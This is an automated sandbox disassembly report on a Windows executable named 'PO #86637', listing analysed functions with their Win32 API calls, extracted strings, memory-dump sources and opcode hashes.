                      • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                      • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                      • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                      • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                      Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                      Download Yara Rule
                      APIs
                      • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                      • GetFocus.USER32 ref: 0046A0DD
                      • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessagePost$CtrlFocus
                      • String ID: 0
                      • API String ID: 1534620443-4108050209
                      • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                      • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                      • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                      • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                      Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                      Download Yara Rule
                      APIs
                      • DestroyWindow.USER32(?), ref: 004558E3
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$CreateDestroy
                      • String ID: ,$tooltips_class32
                      • API String ID: 1109047481-3856767331
                      • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                      • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                      • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                      • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                      Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                      • GetMenuItemCount.USER32(?), ref: 00468C45
                      • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                      • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                      • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                      • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                      • GetMenuItemCount.USER32 ref: 00468CFD
                      • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                      • GetCursorPos.USER32(?), ref: 00468D3F
                      • SetForegroundWindow.USER32(?), ref: 00468D49
                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                      • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                      • String ID: 0
                      • API String ID: 1441871840-4108050209
                      • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                      • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                      • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                      • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                      Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                      • __swprintf.LIBCMT ref: 00460915
                      • __swprintf.LIBCMT ref: 0046092D
                      • _wprintf.LIBCMT ref: 004609E1
                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                      • API String ID: 3631882475-2268648507
                      • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                      • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                      • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                      • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                      Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                      Download Yara Rule
                      APIs
                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                      • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                      • SendMessageW.USER32 ref: 00471740
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                      • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                      • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                      • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                      • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                      • SendMessageW.USER32 ref: 0047184F
                      • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                      • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                      • String ID:
                      • API String ID: 4116747274-0
                      • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                      • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                      • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                      • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                      Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                      • _wcslen.LIBCMT ref: 00461683
                      • __swprintf.LIBCMT ref: 00461721
                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                      • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                      • GetDlgCtrlID.USER32(?), ref: 00461869
                      • GetWindowRect.USER32(?,?), ref: 004618A4
                      • GetParent.USER32(?), ref: 004618C3
                      • ScreenToClient.USER32(00000000), ref: 004618CA
                      • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                      • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                      • String ID: %s%u
                      • API String ID: 1899580136-679674701
                      • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                      • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                      • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                      • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                      Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                      Download Yara Rule
                      APIs
                      • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                      • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                      • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: InfoItemMenu$Sleep
                      • String ID: 0
                      • API String ID: 1196289194-4108050209
                      • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                      • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                      • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                      • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                      Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetDC.USER32(00000000), ref: 0043143E
                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                      • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                      • SelectObject.GDI32(00000000,?), ref: 00431466
                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                      • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                      • String ID: (
                      • API String ID: 3300687185-3887548279
                      • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                      • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                      • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                      • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                      Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                      • GetDriveTypeW.KERNEL32 ref: 0045DB32
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                      • API String ID: 1976180769-4113822522
                      • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                      • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                      • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                      • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                      Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                      • String ID:
                      • API String ID: 461458858-0
                      • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                      • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                      • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                      • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                      Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                      • GlobalLock.KERNEL32(00000000), ref: 004300F6
                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                      • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                      • CloseHandle.KERNEL32(00000000), ref: 00430113
                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                      • GlobalFree.KERNEL32(00000000), ref: 00430150
                      • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                      • DeleteObject.GDI32(?), ref: 004301D0
                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                      • String ID:
                      • API String ID: 3969911579-0
                      • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                      • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                      • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                      • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                      Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                      • String ID: 0
                      • API String ID: 956284711-4108050209
                      • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                      • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                      • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                      • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                      Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                      • String ID: 0.0.0.0
                      • API String ID: 1965227024-3771769585
                      • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                      • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                      • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
